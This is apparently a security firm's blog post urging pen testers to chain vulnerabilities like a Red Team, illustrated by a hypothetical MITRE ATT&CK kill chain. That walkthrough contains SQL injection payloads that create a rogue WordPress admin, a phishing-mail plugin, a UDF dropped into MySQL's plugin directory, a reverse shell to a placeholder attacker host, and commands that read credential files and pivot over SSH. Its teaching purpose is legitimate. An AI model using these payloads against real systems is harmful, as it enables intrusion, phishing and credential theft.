Penetration tests (“pen tests”) are a key element of every organization’s security process. They provide insights into the security posture of applications, environments, and critical resources. Such testing often follows a well-known process: enumerate the scope, run automated scans, check for common vulnerabilities within the CWE Top 25 or OWASP Top 10, and deliver a templated report. Even though this “checklist” approach can uncover issues, it can lack the depth and creativity needed to emulate a genuine cyber threat scenario. This is where the Red Team mindset comes in.
A Red Team simulates realistic adversaries by using advanced tactics, techniques, and procedures (TTPs). Rather than sticking to a mechanical checklist, Red Teamers think like real attackers, aiming to achieve specific goals, such as data exfiltration, domain takeover, or access to a critical system. This approach doesn’t just identify vulnerabilities, it explores the full path an attacker might take, tying vulnerabilities together until a more damaging outcome is achieved (with frameworks like MITRE ATT&CK). It gives an organization a better understanding of their cybersecurity situation and how seriously an attacker could impact their in-scope assets.
Why Think Like a Red Teamer?
Traditional pen testing often ends the moment a vulnerability like SQL injection (SQLi) is discovered and confirmed. The pen tester lists the SQLi vulnerability in the report, explains its impact, provides a Proof of Concept (POC), and presents remediation tips. A Red Teamer, however, goes further: What can be achieved if I chain that SQLi with something else? Can I steal credentials or extract sensitive data from the database? Could I continue to exploit this to achieve remote code execution (RCE)? If I gain RCE, can I pivot from this compromised server to other internal systems? By tracing the entire “kill chain,” Red Teams uncover critical paths that a real-world attacker would exploit, since the goal is to show the complete impact—and this is just one example.
Checking the boxes for vulnerabilities like cross-site scripting (XSS), insecure direct object references (IDOR), and missing HTTP security headers is still important and relevant in this approach to testing, because it provides a baseline of known issues; however, adding a Red Team-style approach to evaluate how seemingly smaller vulnerabilities might chain together is what ensures a more realistic security assessment. Think of it like a live fire drill: you learn a lot more about your readiness when you run the scenario as if it’s happening in real life, rather than just checking if your fire extinguisher is regularly maintained.
Collaborating with the Client
One key difference between a typical pen test and a Red Team exercise is the level of coordination required. A Red Team engagement typically involves continuous collaboration with the client because certain vulnerabilities might cause system outages or a significant data breach. Some clients may not allow the tester to fully exploit certain vulnerabilities once discovered. For instance, if the pen tester finds a critical bug that could lead to data corruption, the client may prefer not to have their production environment impacted. For these tasks, it is better to use UAT environments that are almost identical to production so that no outages occur.
Some scoping calls and planning might be required to give the client the best possible result. The tester should sit down (virtually or in person) with the client to determine the primary objectives of the exercise. For example, are they primarily concerned about data exfiltration, privilege escalation, or compromise of internal resources? This helps the tester align their goals with the client’s highest priorities. Also, rather than waiting until the end of the engagement to share all findings, Red Teams often disclose highly intrusive tests and high-risk vulnerabilities throughout the process. This allows the client’s security teams to approve the tests and observe how an attacker might operate within their environments.
Technical Depth: From SQLi to Full Compromise
Adopting a Red Team mindset doesn’t mean ignoring standard vulnerability checks—those are still crucial. What changes is how you leverage them. Let’s explore a hypothetical path using MITRE ATT&CK techniques:

1. Discovery
Technique: Exploit Public-facing Application (T1190)
The attacker identifies a parameter in a web application that is vulnerable to SQL injection:’ OR 1=1–
Typically, this is where a standard pen testing approach might end: “Parameter X is vulnerable to SQLi. Here’s how to fix it.” However, a red team approach seeks further exploitation paths.
2. Chaining Attacks
i. WordPress-to-Phishing
Techniques: Exploit Public-Facing Application (T1190) & Phishing (T1566.003 – Spearphishing via Service)
Using the SQL injection vulnerability, the attacker enumerates the database and discovers that it is shared with a WordPress installation. With this insight, the attacker injects payloads to create a new administrative user within WordPress:
'; INSERT INTO wp_users (user_login, user_pass, user_email, user_registered, user_status, display_name)
VALUES ('evil_admin', MD5('P@ssw0rd'), '', NOW(), 0, 'evil_admin'); --
'; INSERT INTO wp_usermeta (user_id, meta_key, meta_value)
VALUES ((SELECT ID FROM wp_users WHERE user_login='evil_admin'), 'wp_capabilities', 'a:1:{s:13:"administrator";b:1;}'); --
After logging in as admin, the attacker discovers a plugin that sends emails using the company’s official address (, and uploads a custom plugin to send phishing emails.
For example:
Plugin Name: Phishing Mailer
Description: Custom plugin to send phishing emails.
Version: 1.0
Author: Attacker
function send_phishing_email() {
$to = "";
$subject = "Urgent: Account Verification Needed";
$message = "Please verify your account at:";
$headers = "From:";
wp_mail($to, $subject, $message, $headers);
add_action('init', 'send_phishing_email');
When activated, this plugin sends phishing emails appearing to come from the legitimate company address which could give the attacker internal access.
ii. Remote Code Execution
Techniques: Web Shell (T1505.003) & Command and Scripting Interpreter (T1059)
Building on the SQLi foothold, the attacker compiles the UDF payload as a Linux shared object ( and converts it into a single hex‑encoded string. For demonstration, the command below represents a truncated version of that string:
'; SELECT 0x4d5a90000300000004000000ffff0000b80000000000000040000000000000000000000000000000000...
INTO DUMPFILE '/usr/lib/mysql/plugin/'; --
With the payload written to disk, the attacker registers a new UDF that executes system commands:
Now the attacker can execute a reverse shell to their system:
select sys_exec('bash -i >& /dev/tcp/attacker-server-ip/443 0>&1');
3. Privilege Escalation
Technique: Unsecured Credentials (T1552)
Now with remote code execution obtained in the previous step, the attacker searches for higher-privilege credentials. By dumping OS-level credentials and inspecting configuration files, the attacker uncovers sensitive information such as SSH keys or passwords:
# cat /etc/my.conf
# ls -la /users/user/.ssh/
These findings enable further escalation within the compromised environment.
4. Lateral Movement
Technique: Remote Services (T1021)
Using the extracted SSH key, the attacker pivots to an internal backend server:
ssh -i key user@backend-server-ip
Upon accessing the backend server, the attacker discovers that the API source code is stored in a Git repository. By reviewing the repository’s commit history with a tool like TruffleHog, the attacker uncovers additional leaked credentials, expanding their control over the environment:
[/opt/api] # trufflehog .
5. Objective Attainment
This scan reveals previously committed AWS keys, which the attacker then uses to access additional AWS resources and further compromise the target’s infrastructure.
Using these steps, the attacker gains remote code execution access to two servers, control over AWS resources, and an internal foothold with the phishing plugin.
MITRE ATT&CK Mapping Overview
The following table explains how each stage of the attack aligns with specific MITRE ATT&CK techniques. It highlights the tactics, techniques, and procedures (TTPs) leveraged by the attacker to progress from initial discovery to achieving their final objectives
Phase | Technique Description | MITRE ATT&CK ID |
Discovery | Exploit Public-Facing Application via SQL Injection | T1190 |
WordPress Exploitation & Phishing | SQL injection to create admin user and phishing via service | T1190, T1566.003 |
Remote Code Execution | Deploy web shell and register UDF for command execution | T1505.003, T1059 |
Privilege Escalation | Dump OS credentials from unsecured configuration files | T1552 |
Lateral Movement | Pivot using SSH access to internal systems | T1021 |
Objective Attainment | Use compromised AWS keys to access cloud services | T1078.004 |
By connecting each vulnerability in a realistic kill chain, clients can clearly see how a single oversight can translate into a major breach. This applies to other types of tests, not just web applications:
- IoT Devices
IoT devices, such as smart cameras or industrial control sensors, often have default credentials or unencrypted communications. A Red Teamer might discover a way to intercept and tamper with device firmware, leading to data theft or even physical consequences. For instance, obtaining a hardcoded password and accessing other devices over the MQTT broker could allow control of the devices or extraction of sensitive information, such as screenshots from a camera. - Mobile Apps
Consider a shopping app where developers left critical business logic in plain sight within the client code, including promotional algorithms and discount threshold checks. A Red Teamer could reverse engineer the APK, analyze function calls, and discover ways to unlock secret promotional rates. By manipulating the client’s code, they could grant themselves unlimited discounts and bypass purchase limits. - Cloud Environments
With the growing popularity of AWS, Azure, and GCP, Red Teamers often focus on misconfigurations in IAM policies, exposed S3 buckets, or vulnerable serverless functions. Exploiting these issues can cascade through an entire environment, demonstrating how a single bucket misconfiguration can lead to a breach of confidential data or internal systems.
Benefits to Both Sides
1.) Client Value
- Deeper Insights: The client sees the full potential attack chain, not just a list of vulnerabilities
- Tailored Remediations: Knowing exactly how an attacker could pivot and escalate privileges allows for more targeted, effective solutions.
- Realistic Training: Security teams get hands-on experience defending against a simulated adversary.
2.) Pen Tester Satisfaction
- Deeper Engagement: Rather than just running a routine checklist, you get to dive deep into a system.
- Continuous Learning: You’re more likely to discover new TTPs and refine your tradecraft when you think like an attacker.
- Professional Growth: Real-world exploitation scenarios build credibility, demonstrating advanced skill sets to future clients or employers.
Pen Testing Like a Red Teamer vs. a Red Team Exercise
Bringing a Red Team mindset to pen testing can add value, but it’s important to understand that pen testing like a Red Teamer and running a full Red Team operation are two very different things.
A Red Team exercise is a large-scale, long-term simulation of a real-world adversary. It goes beyond just testing technical vulnerabilities—it includes tactics like phishing, physical intrusion, lockpicking, badge cloning, and covert operations to evaluate an organization’s security as a whole. These engagements can span weeks or even months and require detailed planning, stealth, and coordination.
On the other hand, pen testing like a Red Teamer operates within the structured limits of a pen test. It’s more than just running scans or checking boxes—it involves chaining vulnerabilities, escalating privileges, and digging deeper into potential attack paths; however, it does not include elements like social engineering, physical security breaches, or advanced persistent threat (APT) simulations. Once those come into play, the engagement moves into full Red Team territory, which requires more resources, extended timelines, and different contractual agreements.
Final Thoughts
Adopting a Red Team mindset in pen testing elevates the process from just identifying vulnerabilities to understanding their full impact. Instead of just reporting security flaws, you’re simulating how an attacker could exploit them, giving clients a clearer picture of their real-world risks. This benefits everyone—the client gets a richer security assessment, and testers get more engaging, hands-on experience, refining their skills.
That said, a Red Team approach requires trust and clear communication. Before diving in, both the tester and the client need to define the scope, objectives, and acceptable levels of risk. Whether you’re assessing a web application, a mobile platform, or an IoT ecosystem, thinking like a Red Teamer makes your testing more impactful, providing clients with insights they can actually use to strengthen their defenses.
While it’s important to push the boundaries in pen testing and expose realistic attack paths, it’s just as crucial to recognize that true Red Teaming is a different service. It comes with different expectations, methodologies, and permissions. Keeping that distinction clear ensures ethical testing, aligns with client needs, and maximizes value for both offensive and defensive teams.
At the end of the day, the best pen tests don’t just list vulnerabilities—they show how those weaknesses can be exploited to achieve real-world attack objectives. By embracing this mindset, you’ll conduct more meaningful tests, build stronger client relationships, and contribute to a more secure digital world.